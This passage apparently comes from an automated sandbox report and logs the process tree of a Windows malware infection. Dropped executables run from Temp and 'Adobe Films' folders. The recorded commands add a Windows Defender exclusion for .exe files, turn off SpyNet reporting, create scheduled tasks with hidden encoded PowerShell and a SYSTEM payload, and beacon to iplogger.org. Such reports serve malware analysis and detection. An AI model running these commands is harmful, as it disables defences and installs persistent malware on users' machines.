  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Uaqy7
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3704
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffab2de46f8,0x7ffab2de4708,0x7ffab2de4718
    3⤵
    PID:2500
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5937278540378143348,12863368217294888884,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
    3⤵
    PID:1232
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,5937278540378143348,12863368217294888884,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:3
    3⤵
    PID:2920
- C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe
  "C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Btnm7
  2⤵
  - Adds Run key to start application
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:3692
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffab2de46f8,0x7ffab2de4708,0x7ffab2de4718
    3⤵
    PID:3508
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
    3⤵
    PID:3656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
    3⤵
    PID:3408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
    3⤵
    PID:3824
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
    3⤵
    PID:3184
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
    3⤵
    PID:764
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
    3⤵
    PID:2224
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2408 /prefetch:1
    3⤵
    PID:2480
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
    3⤵
    PID:3220
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1bc,0x22c,0x7ff63e8f5460,0x7ff63e8f5470,0x7ff63e8f5480
      4⤵
      PID:3752
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:8
    3⤵
    PID:2516
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6060 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4088
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3816 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3556
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1
    3⤵
    PID:4656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
    3⤵
    PID:5716
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4796 /prefetch:8
    3⤵
    PID:3932
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6344 /prefetch:8
    3⤵
    PID:5148
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6180 /prefetch:8
    3⤵
    PID:5180
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6196 /prefetch:8
    3⤵
    PID:3576
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4820 /prefetch:8
    3⤵
    PID:5808
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6200 /prefetch:8
    3⤵
    PID:3668
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4860 /prefetch:8
    3⤵
    PID:6120
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3356 /prefetch:8
    3⤵
    PID:2284
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,1847151578115159834,8317214363916101135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4860 /prefetch:8
    3⤵
    PID:6012
- C:\Users\Admin\AppData\Local\Temp\Folder.exe
  "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:3200
- - C:\Users\Admin\AppData\Local\Temp\Folder.exe
    "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -u
    3⤵
    - Executes dropped EXE
    PID:1868
- C:\Users\Admin\AppData\Local\Temp\RobCleanerInstl3183813.exe
  "C:\Users\Admin\AppData\Local\Temp\RobCleanerInstl3183813.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2440
- - C:\Users\Admin\AppData\Local\Temp\48b85f34-ba76-4a43-8811-51001d013e78.exe
    "C:\Users\Admin\AppData\Local\Temp\48b85f34-ba76-4a43-8811-51001d013e78.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3980
- C:\Users\Admin\AppData\Local\Temp\File.exe
  "C:\Users\Admin\AppData\Local\Temp\File.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3476
- - C:\Users\Admin\Pictures\Adobe Films\dhgUgg1lwzVFLeDAWWwO2YJd.exe
    "C:\Users\Admin\Pictures\Adobe Films\dhgUgg1lwzVFLeDAWWwO2YJd.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of SetWindowsHookEx
    PID:4148
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 760
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:6060
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1288
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:1080
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1296
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:4888
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 908
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:6112
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1328
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:5280
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "dhgUgg1lwzVFLeDAWWwO2YJd.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\dhgUgg1lwzVFLeDAWWwO2YJd.exe" & exit
      4⤵
      PID:4704
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "dhgUgg1lwzVFLeDAWWwO2YJd.exe" /f
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3200
- - C:\Users\Admin\Pictures\Adobe Films\Sm_lvl2URwt3bkdpYbN6ppsk.exe
    "C:\Users\Admin\Pictures\Adobe Films\Sm_lvl2URwt3bkdpYbN6ppsk.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:4140
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4140 -s 452
      4⤵
      Drops file in Windows directory
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious use of AdjustPrivilegeToken
      PID:5876
- - C:\Users\Admin\Pictures\Adobe Films\ImMSMmAqtHpIJOu_JPRVxsxL.exe
    "C:\Users\Admin\Pictures\Adobe Films\ImMSMmAqtHpIJOu_JPRVxsxL.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of SetWindowsHookEx
    PID:4132
  - - C:\Users\Admin\Pictures\Adobe Films\ImMSMmAqtHpIJOu_JPRVxsxL.exe
      "C:\Users\Admin\Pictures\Adobe Films\ImMSMmAqtHpIJOu_JPRVxsxL.exe"
      4⤵
      Executes dropped EXE
      PID:4976
- - C:\Users\Admin\Pictures\Adobe Films\P1YB1hAG63Ao1gEROgD7fk7o.exe
    "C:\Users\Admin\Pictures\Adobe Films\P1YB1hAG63Ao1gEROgD7fk7o.exe"
    3⤵
    - Executes dropped EXE
    PID:4124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C del C:\Users\Admin\Pictures\Adobe Films\P1YB1hAG63Ao1gEROgD7fk7o.exe
      4⤵
      PID:5812
- - C:\Users\Admin\Pictures\Adobe Films\1BwX9cFBeToivHJC1osbHAsz.exe
    "C:\Users\Admin\Pictures\Adobe Films\1BwX9cFBeToivHJC1osbHAsz.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Drops file in Program Files directory
    - Suspicious use of SetWindowsHookEx
    PID:4116
  - - C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
      "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
      4⤵
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Program Files directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:5324
- - C:\Users\Admin\Pictures\Adobe Films\VdcmpLWQ4sQClzr_v_nHf2ng.exe
    "C:\Users\Admin\Pictures\Adobe Films\VdcmpLWQ4sQClzr_v_nHf2ng.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4108
- - C:\Users\Admin\Pictures\Adobe Films\LzWgYoMzjeu0S_yZPBZpgsk3.exe
    "C:\Users\Admin\Pictures\Adobe Films\LzWgYoMzjeu0S_yZPBZpgsk3.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:4100
- - C:\Users\Admin\Pictures\Adobe Films\8ZCfgm0NuWkp7PKQifskxkTL.exe
    "C:\Users\Admin\Pictures\Adobe Films\8ZCfgm0NuWkp7PKQifskxkTL.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2928
  - - C:\Users\Admin\AppData\Local\Temp\7zSE9B9.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4460
    - - C:\Users\Admin\AppData\Local\Temp\7zS5237.tmp\Install.exe
        
        .\Install.exe /S /site_id "525403"
        5⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks computer location settings
        Drops file in System32 directory
        Enumerates system info in registry
        Suspicious use of SetWindowsHookEx
        
        PID:3236
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:5924
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:5548
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:5916
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:5496
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        6⤵
        
        PID:5252
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        7⤵
        
        PID:5540
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        8⤵
        
        PID:5640
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        8⤵
        
        PID:6140
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gqEqIUWFh" /SC once /ST 13:41:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        6⤵
        Creates scheduled task(s)
        
        PID:5588
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gqEqIUWFh"
        6⤵
        
        PID:5528
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gqEqIUWFh"
        6⤵
        
        PID:1316
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bnkqNuphAZeBTHhYMc" /SC once /ST 14:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\JJujxgo.exe\" j1 /site_id 525403 /S" /V1 /F
        6⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:4448
- - C:\Users\Admin\Pictures\Adobe Films\IvsskHJfubsqZ5nFS_xpOLRK.exe
    "C:\Users\Admin\Pictures\Adobe Films\IvsskHJfubsqZ5nFS_xpOLRK.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2616
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 464
      4⤵
      Program crash
      Checks processor information in registry
      Enumerates system info in registry
      PID:5864
- - C:\Users\Admin\Pictures\Adobe Films\beb9YTbvJFLvLXX592jpxOvD.exe
    "C:\Users\Admin\Pictures\Adobe Films\beb9YTbvJFLvLXX592jpxOvD.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:368
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c start "" "1.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"
      4⤵
      PID:4684
    - - C:\Users\Admin\AppData\Local\Temp\1.exe
        
        "1.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3668
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qfDf7"
        5⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4136
- - C:\Users\Admin\Pictures\Adobe Films\MFPmIIhwR3njJSHvNPzgPYo6.exe
    "C:\Users\Admin\Pictures\Adobe Films\MFPmIIhwR3njJSHvNPzgPYo6.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3012
- - C:\Users\Admin\Pictures\Adobe Films\DzNmPWdwKQwiMdPEyWA0pWIZ.exe
    "C:\Users\Admin\Pictures\Adobe Films\DzNmPWdwKQwiMdPEyWA0pWIZ.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of AdjustPrivilegeToken
    PID:3752
  - - C:\Users\Admin\AppData\Local\Temp\93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe
      "C:\Users\Admin\AppData\Local\Temp\93ca6fa8-9fe0-4132-baf8-6414ddbd5187.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      Suspicious use of AdjustPrivilegeToken
      PID:4724
  - - C:\Users\Admin\AppData\Local\Temp\c8543649-03e9-461c-bb64-bc5598521773.exe
      "C:\Users\Admin\AppData\Local\Temp\c8543649-03e9-461c-bb64-bc5598521773.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:5448
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1428
        5⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:5760
- - C:\Users\Admin\Pictures\Adobe Films\PhK8unYY2mmDRFfEIEhrxgqj.exe
    "C:\Users\Admin\Pictures\Adobe Films\PhK8unYY2mmDRFfEIEhrxgqj.exe"
    3⤵
    - Executes dropped EXE
    PID:320
  - - C:\Users\Admin\AppData\Local\Temp\go-memexec-2546849896.exe
      C:\Users\Admin\AppData\Local\Temp\go-memexec-2546849896.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4996
- - C:\Users\Admin\Pictures\Adobe Films\T4GuP5xLZ5KygBfWzf7jpOvR.exe
    "C:\Users\Admin\Pictures\Adobe Films\T4GuP5xLZ5KygBfWzf7jpOvR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
